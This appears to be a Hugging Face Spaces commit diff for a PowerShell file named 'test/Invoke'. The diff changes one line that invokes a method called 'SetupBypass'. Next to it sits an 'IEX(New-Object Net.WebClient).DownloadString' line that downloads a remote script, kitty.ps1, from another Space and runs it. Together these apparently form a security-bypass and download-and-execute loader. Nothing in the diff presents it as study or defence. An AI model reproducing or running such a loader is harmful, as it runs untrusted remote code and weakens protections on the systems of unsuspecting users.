Spaces:
Runtime error
Runtime error
Update test/Invoke
Browse files- test/Invoke +1 -1
test/Invoke
CHANGED
@@ -291,7 +291,7 @@ namespace Test
|
|
291 |
}
|
292 |
"@
|
293 |
|
294 |
-
IEX([Test.Program]::SetupBypass())
|
295 |
|
296 |
IEX(New-Object Net.WebClient).DownloadString('https://huggingface.co/spaces/enotkrutoy/gggg/raw/main/test/kitty.ps1')
|
297 |
|
|
|
291 |
}
|
292 |
"@
|
293 |
|
294 |
+
IEX -Command ([Test.Program]::SetupBypass())
|
295 |
|
296 |
IEX(New-Object Net.WebClient).DownloadString('https://huggingface.co/spaces/enotkrutoy/gggg/raw/main/test/kitty.ps1')
|
297 |
|